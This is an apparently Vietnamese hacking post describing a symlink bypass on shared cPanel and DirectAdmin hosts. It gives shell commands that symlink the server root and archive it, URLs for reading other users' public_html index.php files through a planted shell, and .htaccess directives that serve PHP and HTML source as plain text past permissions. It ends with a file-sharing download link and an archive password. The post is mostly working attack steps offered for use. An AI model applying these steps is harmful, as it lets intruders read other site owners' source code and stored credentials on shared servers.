Skip to main content

Symljnk Bypass view file.php


Cpanel (:2082)

ln -s / dmx.txt
tar -zcvf cpanel_dmx.tar.gz 
direct admin(:2222)
ln -s / r00t
tar -zcvf direct_r00t.tar.gz r00t
có quyền login host và giải nén thư mục ra
chạy trên address
cpanel :http://shell_on_this_host_/dmx.txt/home/user_victim/public_html/index.php
direct :r00t/home/user_victim/domains/public_html/index.php

.htaccess

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php 
con .htaccess này có chức năng show ra các file.php dưới dạng file text
nên cho dù permisson thư mục nhưng đên file này vẫn có thể view
hoặc show ra cả file.html
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any 
Download: http://www.mediafire.com/?68yyho1ys1pj9sh
Pass Unlock & Unrar: junookyo

Share